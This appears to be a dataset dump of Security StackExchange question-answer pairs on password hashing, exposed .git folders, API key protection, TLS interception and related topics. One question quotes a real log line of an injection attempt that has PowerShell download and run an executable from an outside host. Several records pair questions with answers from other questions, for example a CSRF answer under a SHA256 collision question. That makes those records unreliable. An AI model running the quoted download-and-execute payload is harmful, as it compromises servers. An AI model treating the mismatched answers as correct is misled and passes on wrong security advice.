source_id
int64
1
4.64M
question
stringlengths
0
28.4k
response
stringlengths
0
28.8k
metadata
dict
246,209
How unsafe would be to publish the hash of my passwords? I have written a Python script for helping me to remember my basic passwords (computer password, encrypted backup password, AppleID password, and KeyChain password). It is hardcoded inside this: SHA256(MD5(password) + password + MD5(password)) for each password and I periodically run it to keep my memory fresh. I have a private repo on GitLab where I store all generic files and I would like to commit this script. I can't see any problem doing this since, as far as I know, it would be impossible to recover the original password, but I prefer to ask experts, to be sure. EDIT: I'm adding an anonymized version of my script, so you can understand how it works: from hashlib import md5, sha256 from getpass import getpass from random import choice def hash(pwd): pwd = pwd.encode() return sha256((md5(pwd).hexdigest()+str(pwd)+md5(pwd).hexdigest()).encode()).hexdigest() dict = {'pass1': '6eaa49070c467d1edead2f6bc54cf42cdda11ae60d40aef2624a725871d3f452', 'pass2': '240cbc4ba2661b333f9ad9ebec5969ca0b5cf7962a2f18a45c083acfd85dd062', 'pass3': 'b018ed7bff94dbb0ed23e266a3c6ca9d1a1739737db49ec48ea1980b9db0ad46', 'pass3': '7dd3a494aa6d5aa0759fc8ea0cd91711551c3e8d5fb5431a29cfce26ca4a2682' } while True: tipologia, hash_result = choice(list(dict.items())) while True: pwd = getpass(f'Password {tipologia}: ') if hash(pwd) == hash_result: print('Correct!') break else: print('Wrong!')
There are a couple problems with this approach. First of all, you're using two plain cryptographic hash functions to hash your data. By themselves, cryptographic hash functions are designed to be fast. That means that it's extremely easy for an attacker to try to brute-force your password. The only time it's safe to use a plain cryptographic hash function to hash a secret is when that secret is a sufficiently long output of a CSPRNG (i.e., it has at least 128 bits of entropy). In order to even store this password securely on a system, you should be using a password hashing function like one of the crypt functions on your system, scrypt, or Argon2, which are designed to be iterated and expensive to prevent brute forcing. Second, you have no salt for this password. As a result, anyone can just hash the output of a large password list as found in any of a number of breaches and create a giant table of passwords using this scheme. If you were using a secure password hashing system, it would require a reasonably long salt to randomize the password and prevent generation of so-called rainbow tables to make guessing a simple table lookup. Third, you are using MD5, which should not be used for anything anymore. MD5 has been known to be totally insecure for 17 years, and there is no longer a justifiable reason to use it at all. Carnegie Mellon University says it is “unsuitable for further use,” and responsible parties do not use it. Fourth, it is strongly preferable not to disclose the password hashes at all. Passwords are securely hashed both to make guessing expensive and make it harder to guess even if the hashes are exposed, but if a person somehow gets your hashed password and it's guessable, they'll be able to guess it with enough effort. Your password must therefore be reasonably secure and contain sufficient entropy that it is computationally infeasible to guess even if the hash is exposed. It also needs to not be reused, because if it's ever exposed elsewhere, then you have to assume the attacker knows it (because usually, they can find it) and it then becomes just another entry in an easy word list to guess.
{ "source": [ "https://security.stackexchange.com/questions/246209", "https://security.stackexchange.com", "https://security.stackexchange.com/users/252880/" ] }
246,256
As a security in-charge, I just noticed that one of our production web apps was attacked by some hackers. The attacker accessed the .git/objects/ files. I already modified .htaccess to make .git and its content inaccessible. The attacker may get some model file which includes some data queries but not with database credentials. Should I worried about it?
Should I worried about it? Worried? No, of course not. You should be absolutely terrified and have nightmares about this. Having stolen .git directory means the attacker have the current and past source for the production server, all history of all code since the start of the repository. With that, they can reconstruct your infrastructure, and do a white box testing against the code. They will be looking for remote code execution, file inclusion, and SQL Injection right now. And your developers must review every function handling user supplied data (cookies, parameters, URL queries, etc) for any possible vulnerability. You did a good start by denying access to .git on the servers, but your work is just starting. Your code is now known to attackers, and they are inspecting the code for vulnerabilities. If any time someone hard-coded credentials on the code and commited it, the attacker have that password. Things you should do: full code review from a reputable company consider using a Web Application Firewall install IPD/IDS (Intrusion Prevention/Detection Systems) change every single database password rename the database if possible Be prepared to fight fine-tuned targeted attacks.
{ "source": [ "https://security.stackexchange.com/questions/246256", "https://security.stackexchange.com", "https://security.stackexchange.com/users/252924/" ] }
246,319
When creating a self-signed certificate you are asked to enter some information (First Name, Last Name, Organization Unit, Organization, City, State,...). Is it possible to update any of those fields later? (E.g. my company changed its legal name and now I want to update the "Organization" name to reflect the new one.)
No, if you changed those informations on the certificate, the fingerprint changed, and the signature is invalid. You will need to issue a new certificate.
{ "source": [ "https://security.stackexchange.com/questions/246319", "https://security.stackexchange.com", "https://security.stackexchange.com/users/236749/" ] }
246,434
I have an API Key to a paid service. This API is invoked from an unauthenticated page on my site. I am proxying the request to the paid service through my backend server. I have also added CORS on the API to make sure it is called from my site. THe above protections work when a user is accessing it through the browser. However, the API can be accessed from postman and this could result in me having a huge bill for the paid service. What is the best way for me to ensure that the API is only called from my JS client?
You can't. Even for things that aren't a website, like an embedded device, somebody could always open up the hardware and inspect the firmware or, in an extreme case, de-cap the chips and examine them with an electron microscope. For websites, it's utterly trivial. Anything and everything your client can do, so can any other client. That's inherent in the decentralized nature of the Internet and also in the way web pages work. There are things you can do to limit abuse, like having your server make the request (rather than the user's browser) and limiting the rate at which it will do so on your users' behalves. Authentication might potentially let you limit requests per user and/or pass along the bill. Actually controlling the client used to talk to your server (or the third-party one) is impossible, though. At best, you can obfuscate your code and try to hide the access key, but in the end, you can't hide it perfectly.
{ "source": [ "https://security.stackexchange.com/questions/246434", "https://security.stackexchange.com", "https://security.stackexchange.com/users/233843/" ] }
246,484
I've created a method to allow my project EditVideoBot to be 'decentralised', where rather than the program processing and uploading all video editing requests on my own central server, users can volunteer to run this program on their computer and take some of the load off my server. I'd like to be able to start distributing the program, but I have one major concern: In order for the program to upload the final edited video to Twitter, it needs my Twitter API keys. Obviously, I need a way to encrypt the keys so they're not accessible to the user running the program (otherwise they have full access to my account). The bot is programmed in Python. I don't really know where to begin with keeping the keys secure if the program is running on another computer. Edit: If there was a method with the Twitter API to generate keys that have restricted priveliges (e.g. they can only access the media-upload endpoint but not any other endpoints) that would be the best method. (like with Cloudflare's API). Then, they'd forward the returned media-id to my server where it has full access and posts the tweet attaching the media ID. I don't think they have that capability though, so another method is needed.
As specified, the problem is completely impossible. You can not, and should not attempt to, make a program - much less a script - do something its user can't see. There are many ways the attacker could break this. They could just read and analyze your python scripts (even if compiled, .pyc is easy to decompile). They could debug the program as it runs. They could intercept the network requests it makes to Twitter and pull the key out of there. They could replace the Python HTTPS library with one that wraps the official API and also logs a copy of the requests and responses to plain text. They could load your program as a library of another python program and programmatically examine its contents... Seriously, people keep asking about this and it just can not be done. As @Limit's comment says, your best bet is to expose an API from your server, and have your script call that with whatever it wants to put on Twitter. You can then validate the message before posting it, rate-limit each client's uploads, prevent abuse of the account such as deleting tweets or using DMs, and revoke third-party access to the account entirely just by disabling the endpoint on your server. This isn't enough to totally prevent abuse, but it'll do a lot better than any method of trying to hide secrets in a Python script. Another option is to use unique Twitter accounts per user. Either require the users to create/supply their own account (which your server then learns about and monitors for uploads, perhaps with specific tags or mentions), or automatically create one (well, as automatically as Twitter will let you get away with) for each node and don't use them for anything else (the user running the node would still have full access to the account in each case, but not to any other accounts). Or you could just have the nodes send the resulting videos to your server, and your server decides what to do with them. This is basically the same as the first viable approach, except the new endpoint is not "send video here to upload to Twitter", it's just "send video here when done" and you-the-server-owner decide what to do with it then.
{ "source": [ "https://security.stackexchange.com/questions/246484", "https://security.stackexchange.com", "https://security.stackexchange.com/users/244539/" ] }
247,844
Say I cloned a repo, then maybe worked on it a bit. Then I reverted/pushed all changes, so my friend has all the repo files. Is it safe for me to send him the .git folder? Is there any private information there, such as my username, my email, command history, or perhaps some secrets?
The contents of your .git repository may contain loose objects that you may not want to share (e.g. something you committed but changed your mind and deleted/amended), so there is no definite "yes, this is safe." A better way to share git repositories offline is to create a bundle file and send that to your friend, e.g.: git bundle create /tmp/myrepo.bundle --all Then you can send myrepo.bundle to your friend and they can clone from it like they would from any remote: git clone myrepo.bundle That would be a better way to make sure that you're not sharing loose objects that aren't intended to be seen by others.
{ "source": [ "https://security.stackexchange.com/questions/247844", "https://security.stackexchange.com", "https://security.stackexchange.com/users/123249/" ] }
247,857
I signed into my bank's website and they demanded I change my username because it was found on the web--duh, it's my name and I've been online since the old BBS days. Huh? Since when are account names something to be protected? The rules presented for usernames included that it couldn't be part of my e-mail. However, after rejecting (firstname)(lastname) their system suggested (firstname)_(lastname). Is the latter really any more secure? Is there reason behind this or is it just "cargo cult" behavior?
The contents of your .git repository may contain loose objects that you may not want to share (e.g. something you committed but changed your mind and deleted/amended), so there is no definite "yes, this is safe." A better way to share git repositories offline is to create a bundle file and send that to your friend, e.g.: git bundle create /tmp/myrepo.bundle --all Then you can send myrepo.bundle to your friend and they can clone from it like they would from any remote: git clone myrepo.bundle That would be a better way to make sure that you're not sharing loose objects that aren't intended to be seen by others.
{ "source": [ "https://security.stackexchange.com/questions/247857", "https://security.stackexchange.com", "https://security.stackexchange.com/users/4020/" ] }
248,219
I've been watching videos of scammers being tricked. Frequently, the scammer makes their scam victim install some weird "remote desktop" program claimed to be for tech support purposes. These programs apparently allow the person connecting to the host (victim) computer to "black the screen" so that it becomes impossible for them to see what's being done. Why would any legitimate "remote desktop" software have such a feature? What non-scam purpose could there be for that?
So that passers-by cannot see what you are doing on your computer. If you are connecting remotely to a computer in an office, then everyone could see everything you type and you would not know. It is a basic , expected , and legitimate feature . (By the way, that's the top 8 remote desktop programs each with a "blank screen" feature for the express purpose of privacy. I could keep looking up more apps, but that would seem to be redundant.)
{ "source": [ "https://security.stackexchange.com/questions/248219", "https://security.stackexchange.com", "https://security.stackexchange.com/users/255379/" ] }
248,222
I'm developing an application that will connect to Microsoft SQL Server in a local network: I'm considering whether these connections need to use TLS Or whether to leave it to the customer's administrators to use an encrypted tunnel, if they see fit. they may have other third party applications, also connecting to SQL Server. But i'm not familiar with the solutions available to administrators to use an encrypted tunnel, besides VPN (and maybe a load balancer?). Questions What would you do? What are the disadvantages to not using TLS in this context? Are there any solutions available for sending connections through an encrypted tunnel? (examples of products please) I would prefer the simpler case, where i'm not responsible for the encryption Edit : I expect that SQL Server will be running in a local network
So that passers-by cannot see what you are doing on your computer. If you are connecting remotely to a computer in an office, then everyone could see everything you type and you would not know. It is a basic , expected , and legitimate feature . (By the way, that's the top 8 remote desktop programs each with a "blank screen" feature for the express purpose of privacy. I could keep looking up more apps, but that would seem to be redundant.)
{ "source": [ "https://security.stackexchange.com/questions/248222", "https://security.stackexchange.com", "https://security.stackexchange.com/users/255384/" ] }
248,295
Update (April 15): The forked repo and the user do not exist any more. Yesterday, one of my GitHub projects was forked and there is a suspicious commit on the fork of the repo. As you can see from the commit the GitHub Actions configuration installs ngrok on the server, enables firewall access to rdp and enables rdp on the server. Can someone explain what the potential attacker is trying to achieve and why the person behind it couldn't do the same in their own repo? Is this a new type of attack and what should I do?
This isn't trying to make users install malware. This is trying to run malware on the build server . They fork the repository, install a malicious build script, create a Pull Request (PR) for the fork, and then the build will run for the PR and it will look like it's coming from your repository. When Github staff look at why their build servers are mining bitcoins, they'll see that it's a build job for your repository. (But they're probably smart enough to see it's from a malicious PR)
{ "source": [ "https://security.stackexchange.com/questions/248295", "https://security.stackexchange.com", "https://security.stackexchange.com/users/255510/" ] }
248,321
I have implemented an authentication system which works like this: Upon successful login, the server takes the username of client and encrypts it with AES-256. This ciphertext is stored in the client's browser and when the client wants to do something which requires login, this ciphertext is sent to the server. The server decrypts the ciphertext and obtains the username of the client who is logged in. An attacker cannot breach a client's account because he/she doesn't know the encryption key, so it doesn't matter if the attacker knows the username. However, I'm worried if client's browser is exposed, the attacker will access both the ciphertext and plain text (username). Does this allow the attacker to "calculate" the encryption key given that both the ciphertext and plaintext are known? Because that key is used for all clients, so if it's exposed the entire system is ruined.
In answer to your main question, AES256 is secure as far as we know into the foreseeable future. However your authentication scheme has several drawbacks. First, if any request where the token is sent is compromised, or if a the user installs a malicious addon that can grab the encrypted user name from their browser, that account is forever unusable. You are essentially creating a token to use for authentication that cannot ever be changed and that is a 1:1 relationship with the user name. The only way to deny access if it is compromised is to shut down the account and force the user to create a new account with a different username. A much better way would be to generate a random token when the user authenticates and store that in the database, or generate a random value and encrypt that as the token. Then if the account is compromised or if the user wishes to 'log out', you can remove that token and generate a new one. If your encryption key is ever compromised or if it is ever cracked somehow, the attacker can do anything as any user in your system. With a random token based approach, they would have to know the random part used to generate the token for each user. The attacker would have to have access to your database and your encryption key.
{ "source": [ "https://security.stackexchange.com/questions/248321", "https://security.stackexchange.com", "https://security.stackexchange.com/users/255548/" ] }
248,357
I was wondering that, when a hacker is trying to hack a Wi-Fi network, they would try to capture a handshake and then try to decrypt it, whereas when you want to log in to your Wi-Fi access point, you would type in your password, the password would be encrypted, and then sent to the router which would decrypt it using a key. So why can't a hacker just intercept the encrypted password (the handshake) and the just resend it to the router without having to decrypt it like a replay attack?
Because the protocol is built to protect against that. whereas when you wanna login to your wifi you would type in your password and the password would be encrypted then sent to the router which would decrypt it using a key This is not how it works, on many levels. The password is never sent over the air, and it's a more complicated protocol, with multiple back and forth-messages - commonly referred to as a four way handshake. It uses a nonce to ensure that the packets are not equal. The nonce is basically a random number added by either party to explicitly avoid replay attacks, by forcing the content to differ. The access point gives the client a nonce, and the client uses that nonce in further calculations. An attacker replaying the data would be betrayed by the fact that the AP can tell that it's not using the nonce supplied by the AP to the attacker. Furthermore, if we have a look at the four way handshake , we see that neither party sends the actual secret over the air. They just prove that they know it for each other, so there's a mutual authentication.
{ "source": [ "https://security.stackexchange.com/questions/248357", "https://security.stackexchange.com", "https://security.stackexchange.com/users/235772/" ] }
248,421
I'm looking into setting up 2-factor authentication for my registered accounts. However, when setting up 2FA, for example Reddit, you need to write down backup codes in order to regain access to your account in case you lose your smartphone. I've already read this post . But the whole point of using password managers (yes, that's another thing) is that you don't have to write down all the passwords you've been using for all your registered accounts, and still can have different passwords for all websites in case a website gets hacked and appears to have stored all passwords in either plaintext/encrypted form (yes, yes, it still happens today ). Since writing down passwords, keys, codes is really old-school. So I'm feeling that writing down backup codes for the platforms supporting 2FA is a real step back. In fact you'd have to store these codes written on paper in a safe. Is there any way I can be sure to regain access to my account that's been setup to use 2FA, when I lost my phone, without having to fallback to silly backup codes I've written down on paper, for each website? Does this also mean that if you lose your phone and backup codes, you can't access your account at all?
Writing them to paper is one of the simplest, guaranteed to be safe from malware and hardware failure for the average people. If you have a password manager, usually you can store secure notes too, which can handle backup codes. But if you do that, then attackers who managed to breach your password manager now have everything they need to get into your account. Some 2FA apps like Authy allow syncing and backing up codes across multiple devices, but this also means you've multiplied the weak links. You don't have to take a single approach for all of your account, perhaps you decide your social media account is not that vital and store the backup code in online account or sync the 2FA token, while still writing your email backup code in a piece of paper because it's the gateway for every account you have.
{ "source": [ "https://security.stackexchange.com/questions/248421", "https://security.stackexchange.com", "https://security.stackexchange.com/users/236361/" ] }
248,428
I have worked on many API integrations scenarios and I used 2 approaches to authenticate the API calls: Using API Keys For example inside Hubspot integration I use this web call to get all the accounts using API Key: https://api.hubapi.com/companies/v2/companies/paged?hapikey=**********&properties=website&properties=mse_scan&properties=phone&limit=100 Using OAuth For example inside SharePoint I create an app which generates a ClientID & ClientSecret, then inside my project's web.config I store the clientID & ClientSecret <appSettings file="custom.config"> <add key="ClientId" value="e****7" /> <add key="ClientSecret" value="**=" /> </appSettings> In both cases we have confidential info passed/stored, either APIKey or ClientID and ClientSecret. So from a security point of view, is it true that using oAuth isn't more secure than using APIKeys? Because if a malicious actor gets the APIKey then they can access our application but if they get the ClientID and ClientSecret then they can also access it.
Writing them to paper is one of the simplest, guaranteed to be safe from malware and hardware failure for the average people. If you have a password manager, usually you can store secure notes too, which can handle backup codes. But if you do that, then attackers who managed to breach your password manager now have everything they need to get into your account. Some 2FA apps like Authy allow syncing and backing up codes across multiple devices, but this also means you've multiplied the weak links. You don't have to take a single approach for all of your account, perhaps you decide your social media account is not that vital and store the backup code in online account or sync the 2FA token, while still writing your email backup code in a piece of paper because it's the gateway for every account you have.
{ "source": [ "https://security.stackexchange.com/questions/248428", "https://security.stackexchange.com", "https://security.stackexchange.com/users/217508/" ] }
248,750
Client B connects to server A using TLS. B knows A by it's FQDN (e.g. www.alice.tld ), and by a root certificate for a CA that issued a certificate to A for this FQDN. Say B uses HTTPS and a standard web browser, and the certificate A holds comes with a chain of certificates to a CA which is in B's browser's whitelist. State actor M is able to coerce B's ISP to use routers M supplies (or equivalently, route B's traffic thru a router under control of M). M also is able to get certificates that B's browser will trust for any FQDN, because M has foot in one of the myriad of CAs with this ability. Correct me if I'm wrong, but AFAIK there's nothing built into TLS or HTTPS to stop M from having their router perform a MitM attack, where the router holds a rogue certificate for A's FQDN, uses it to impersonate A w.r.t. B, and connects to A as B would (here, unauthenticated). In theory, no public point-to-point protocol can be effective against such MitM attack. However, in practice, that could be detected Some link from A to B with trusted integrity will do: A can publish the certificates it uses (or just their hashes/fingerprint), and B can check if the certificate it uses as being A's is in this list. Some public service could try to do just that instead of A, collecting certificate(s) A uses thru a variety of links hopefully out of the influence of M, and republishing it as tweets, radio broadcasts, printed handouts, or other hard-to-censor means. It's enough to pass that same info on top of the TLS link using a protocol against which M has not yet implemented countermeasures. For a start, a new experimental HTTP(S) header where A sends the hash of the certificate it currently uses would do. Question: is there some ongoing effort to detect such MitM attack on TLS? What method(s) does it use?
Certificate transparency is a system that indexes all certificates. Domain owners can watch the certificate transparency logs to see if any certificate has been issued that they did not request. Browsers may check the certificate log, to make sure that every certificate they encounter is added to the log. So M can create a certificate and: not add it to the log. B 's browser can detect that the certificate has not been added, and is thus likely a fraudulent certificate. add it to the log. A can detect that a unauthorized certificate has been issued.
{ "source": [ "https://security.stackexchange.com/questions/248750", "https://security.stackexchange.com", "https://security.stackexchange.com/users/6211/" ] }
248,838
Spam is everywhere and everyone gets it ( especially professors ), but I noticed that my personal email does not get much spam. How can I get more? What are the most common ways of getting spam? Not just by forgetting to unsubscribe from a mailing list, but also how do hackers get access to email addresses?
Spammers will "scrape" the internet for email addresses and use programs to collect millions of addresses. Or just download them . If you want your email address to be picked up by spammers, you need to expose your email in multiple different places. The common targets for spammers are social media sites and places like pastebin.
{ "source": [ "https://security.stackexchange.com/questions/248838", "https://security.stackexchange.com", "https://security.stackexchange.com/users/232403/" ] }
248,853
Today, when my boss talking with me, he suddenly said: No you don't need to worry about it, everyday you have 3 or 4 messages with agent in Linkedin right? I am very very surprised, because : I work at home. I don't use VPN. I use Linux (Ubuntu) system which installed by me. I login with my Chrome / Gmail account. I use my personal outlook. everytime I talk with interviewers, I use my Zoom account. I use myself mobile phone, my sim card. The only thing is I daily use laptop provided by company. But as a 15 years IT engineer, I can not see how possible company can view my data. Especially he know there are 3 or 4 people I talking with everyday. The only possible is is there any possible Linkined provide service that would send my data to our company?
Your boss is likely making assumptions. They can't read your messages on LinkedIn (unless you have your inmails forwarded to your work email and your company is monitoring your inbox....unlikely) The data LinkedIn publishes suggests that 80% of its users are open to hearing about new career opportunities and these days if you can even spell security then you're likely already getting many inmails with recruiters hitting you up for jobs. I think maybe your boss is just probing....Don't address it, it's not their business.
{ "source": [ "https://security.stackexchange.com/questions/248853", "https://security.stackexchange.com", "https://security.stackexchange.com/users/256430/" ] }
249,057
I was reading this article which talks about a design to shorten URLs, and in the design section, it says that the given URL can be hashed using a hashing algorithm such as MD5, and then be encoded for display purposes using base64 or similar encoding. I am confused so as to why would we need to encode a hashed string. Is it not safe to display an MD5 hash, or is there any other benefit? Can anyone shed some light on this? I tried searching online, and a lot of pages talk about encryption, etc but not about the above scenario.
Hash functions output binary data, usually as a byte array. This cannot be displayed correctly, therefore, you need encoding. Transmitting binary data can create problems, especially in protocols that are designed to deal with textual data. To avoid it altogether, we don't transmit binary data. Many of the programming errors related to encryption on Stack Overflow are due to sending binary data over text-based protocols. Most of the time this works, but occasionally it fails and the coders wonder about the problem. The binary data corrupts the network protocol. Therefore hex, base64, or similar encodings are necessary to mitigate this. Base64 is not totally URL safe and one can make it URL safe with a little work. In another way, character encodings are reversible and don't require encryption keys. This has nothing to do with security ; it is about visibility and interoperability .
{ "source": [ "https://security.stackexchange.com/questions/249057", "https://security.stackexchange.com", "https://security.stackexchange.com/users/256774/" ] }
249,274
I have a Django application running on a Digital Ocean Ubuntu server. I am using NGINX and Daphne to serve the application because I am using Django Channels. My websockets keep crashing, and I noticed in the logs when the crash occurs, this message: 127.0.0.1:46138 - - [11/May/2021:14:03:33] "GET /public/index.php?s=index/think\ap p/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20 /c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hog noob.se/download.exe','%SystemRoot%/Temp/nagagewrehutkiz561.exe');start%20%SystemR oot%/Temp/nagagewrehutkiz561.exe" 404 2111 It looks very suspicious to me, but my knowledge of security is minimal. Can anyone help me determine if this is something I should be concerned about? The fact that it is a GET request that I did not submit (nobody else is using this server currently) But perhaps it is something automatically submitted by my browser?
Can anyone help me determine if this is something I should be concerned about? Someone is trying to exploit a vulnerability on your server. References to cmd.exe , System.Net.WebClient and %SystemRoot% indicates this exploit is intended to a Windows server. It shows your server returning HTTP 404, with 2111 bytes on the response (those last 2 values on your log). That means your server does not have the vulnerable /public/index.php file, so no damage was done on this case. Your websocket probably is dying because you aren't properly processing unexpected input, and this is a MASSIVE SECURITY ISSUE (bold capitals because I cannot use blinking red text font). Failing to detect malformed input and reacting to that is the source of countless exploits. If you don't know much about security, you can be sure that your server will be hacked sooner or later. Take your server offline, install a Linux VM on your desktop, and train on your VM first. Read articles on Linux hardening, on securing Nginx and Django, on secure coding. Your server can be a threat to anyone on the internet as soon as someone hacks it and turns it into a hacking platform to launch attacks. nobody else is using this server currently As soon as your server is reachable from the internet, that statement is not true anymore.
{ "source": [ "https://security.stackexchange.com/questions/249274", "https://security.stackexchange.com", "https://security.stackexchange.com/users/257093/" ] }
249,291
Based on this question . Why are there more research papers on Android malware than iOS malware?
Android has 87% market share . Even if attackers manage to infect small percent, that is still lot of devices they can cover in small time frame they get before the vulnerability is fixed or malware is detected. Android suffers from infamous fragmentation problem due to which most android devices lose security updates after 3 - 4 years and forever become vulnerable to new vulnerabilities. This gives attackers large timeframe to spread malwares through various channels until they are caught by Google Play Store and anti-malware agencies. So more malwares are built for android devices. Android allows flashing of custom images which can used to gain root access. This is useful for researchers to disable some SELinux policies, customise kernel, attach debugger with the malware, dump its memory and analyse post exploitation behaviour of malware in real environment. Qualcomm, Samsung and MediaTek release platform tools for their SoCs which can reflash even hard-bricked devices. This lowers research cost and if experiments go wrong, there's a safe state to go back to without requiring specialised hardware programmers. Using these tools, the process can also be automated to test malware samples in different OS versions and in generic system images .
{ "source": [ "https://security.stackexchange.com/questions/249291", "https://security.stackexchange.com", "https://security.stackexchange.com/users/232403/" ] }
249,473
The Spring docs state : Our recommendation is to use CSRF protection for any request that could be processed by a browser by normal users. If you are only creating a service that is used by non-browser clients, you will likely want to disable CSRF protection. I'm interested in why? Why is it OK to disable CSRF protection when building a service whose only clients are non-browsers, but it should be enabled when the service talks to browser clients?
It comes down to the fact that CSRF is an attack against browsers, so if your service is exclusively used by non-browsers there's no point in using anti-CSRF defences, which can be expensive so may be worth disabling. When a browser interacts with a server, each request comes in separately, so if the service wants to have authentication it needs to add in some scheme to connect requests (to avoid having to have the user authenticate every request). One common way is to set a cookie to the user's browser, which is automatically send when every subsequent request by the browser). Client logs into service Server sets a http-only cookie Malicious script in browser sends a request to e.g. transfer money to the attacker (browser automatically attaches cookie) User loses money vs. with protection Client logs into service Server sets a http-only cookie Malicious script in browser sends a request to e.g. transfer money to the attacker (browser automatically attaches cookie) Server rejects the request as the it doesn't have the correct CSRF fields. However malicious scripts can make requests to the server, and the browser will helpfully included the cookie. However the script won't have access to the cookie directly (assuming the right cookie option is specified). Therefore a protection against CSRF is to have something in the request separate from the cookie (i.e. a hidden field on a form) that can be verify the request came from a proper form, rather than a script. CSRF relies on the browser sending the cookie with a cross-site request automatically, since Javascript/attacker's site don't have access to the cookie. CSRF protection relies on the server correlating something the browser sends automatically (the cookie) with something in the form (the token). A non-browser client will be in control of both the token and the cookie so can make them match (if it can get the cookie at all). So there's no point having complicated CSRF protection if the service is never going to be accessed by a browser. TL/DR - CSRF is inherently a browser attack, so protections against it are only required for services that might be accessed by a browser.
{ "source": [ "https://security.stackexchange.com/questions/249473", "https://security.stackexchange.com", "https://security.stackexchange.com/users/245652/" ] }
249,489
If only the first h bits of a certain SHA256 hash H of a certain message M are known, and one had managed to successfully guess an input message M' whereby SHA256( M' ) yielded an H' whose first h bits match the known h bits of H , is there any way to formalize what the likelihood is that the guessed M' is identical to M ? ie.: Pick any M , set H = SHA256( M ) Pick any M' , set H' = SHA256( M' ) , such that: H[0..h] == H'[0..h] What are the odds that M == M' ? Given that SHA256 is expected to be cryptographically unbiased, is it fair to assume that the likelihood is h / 256 ? Bonus question: What about HMAC-SHA256, where the message is also a given but the key is being guessed? Barring an immediate answer, how would I approach this problem? Edit: My original question did not bound for the size of M . Let's assume a known fixed-length M of size m . Bonus points if you can describe a way to loosen these bounds and still formalize an approach to calculating collision odds. If any additional bounds are required in order to formalize a response, feel free to introduce and justify them. The best answers are supported by a rational that can be checked, followed and validated, not merely statements of fact. I assume the overall odds of a hash collision in SHA256 will play into the final solution. Bonus points if you can generalize your answer beyond SHA256.
It comes down to the fact that CSRF is an attack against browsers, so if your service is exclusively used by non-browsers there's no point in using anti-CSRF defences, which can be expensive so may be worth disabling. When a browser interacts with a server, each request comes in separately, so if the service wants to have authentication it needs to add in some scheme to connect requests (to avoid having to have the user authenticate every request). One common way is to set a cookie to the user's browser, which is automatically send when every subsequent request by the browser). Client logs into service Server sets a http-only cookie Malicious script in browser sends a request to e.g. transfer money to the attacker (browser automatically attaches cookie) User loses money vs. with protection Client logs into service Server sets a http-only cookie Malicious script in browser sends a request to e.g. transfer money to the attacker (browser automatically attaches cookie) Server rejects the request as the it doesn't have the correct CSRF fields. However malicious scripts can make requests to the server, and the browser will helpfully included the cookie. However the script won't have access to the cookie directly (assuming the right cookie option is specified). Therefore a protection against CSRF is to have something in the request separate from the cookie (i.e. a hidden field on a form) that can be verify the request came from a proper form, rather than a script. CSRF relies on the browser sending the cookie with a cross-site request automatically, since Javascript/attacker's site don't have access to the cookie. CSRF protection relies on the server correlating something the browser sends automatically (the cookie) with something in the form (the token). A non-browser client will be in control of both the token and the cookie so can make them match (if it can get the cookie at all). So there's no point having complicated CSRF protection if the service is never going to be accessed by a browser. TL/DR - CSRF is inherently a browser attack, so protections against it are only required for services that might be accessed by a browser.
{ "source": [ "https://security.stackexchange.com/questions/249489", "https://security.stackexchange.com", "https://security.stackexchange.com/users/10268/" ] }
249,683
Password length/complexity only mitigates a brute force attack, correct? In the event of a hash leak, since any algorithm is a fixed length, there could potentially be a pre-image* with a very short / not complex string? Salting notwithstanding.
Say you have a dozen people on a beach. You get each person in turn to pick a grain of sand at random, and without looking at it, write their name on it and throw it back randomly onto the beach. What are the chances two people write their name on the same grain of sand? The size of the key-space for human-generated passwords is around 40 bits according to Wikipedia . The key-space for most modern cryptographic hashes is 128 or 256 bits. This is such an astronomical difference in the sizes of the two sets, the overwhelming majority of possible hash values are not reachable from a typical password. The chances of a collision are like two people picking the same grain of sand on a beach. To reach a collision, you would typically have to iterate through half of the hash key-space. In doing so you would have to generate a password that is likely to be far longer, and far less like a human-chosen word, that the actual original password would have been much easier to guess.
{ "source": [ "https://security.stackexchange.com/questions/249683", "https://security.stackexchange.com", "https://security.stackexchange.com/users/257888/" ] }
249,728
I was reading this article about MD5 hash collisions in which it clearly states that these two strings (differences marked with ^ ): d131dd02c5e6eec4693d9a0698aff95c2fcab58712467eab4004583eb8fb7f8955ad340609f4b30283e488832571415a085125e8f7cdc99fd91dbdf280373c5bd8823e3156348f5bae6dacd436c919c6dd53e2b487da03fd02396306d248cda0e99f33420f577ee8ce54b67080a80d1ec69821bcb6a8839396f9652b6ff72a70 d131dd02c5e6eec4693d9a0698aff95c2fcab50712467eab4004583eb8fb7f8955ad340609f4b30283e4888325f1415a085125e8f7cdc99fd91dbd7280373c5bd8823e3156348f5bae6dacd436c919c6dd53e23487da03fd02396306d248cda0e99f33420f577ee8ce54b67080280d1ec69821bcb6a8839396f965ab6ff72a70 ^ ^ ^ have the same MD5 hash. Although testing this hypothesis with this MD5 generator , they do not have the same hash. The first string hashes to edde4181249fea68547c2fd0edd2e22f and meanwhile the second to e234dbc6aa0932d9dd5facd53ba0372a which is not the same. Why is it being said that these two strings produce the same MD5 hash value?
... in which it clearly states that these two strings ... No. It clearly states "... two different sequences of 128 bytes ..." . There is a huge difference in these statements. In the first the strings are taken as they are. In the second one will hopefully realize that these are 256 character long strings which consist of hexadecimal characters and that one needs to convert these to binary to get the 128 bytes . Once this conversion is done and the MD5 is computed from the actual 128 bytes one will see that both byte sequences result in the same MD5, namely 79054025255fb1a26e4bc422aef54eb4 (matching the article). This can for example be reproduced by using this site and choosing bytes in format hexadecimal as input.
{ "source": [ "https://security.stackexchange.com/questions/249728", "https://security.stackexchange.com", "https://security.stackexchange.com/users/239149/" ] }
250,025
I've been reading a bit into car security and all of the ways cars can be stolen through various alterations of replay attacks. Upon researching whether any of the more modern cars are using anything more secure than "new code after usage", I haven't really found anything satisfying. Which makes me question, why don't car manufacturers just use something like RFC 4226 to secure the cars? It seems like an easy enough solution. Am I missing something here perhaps?
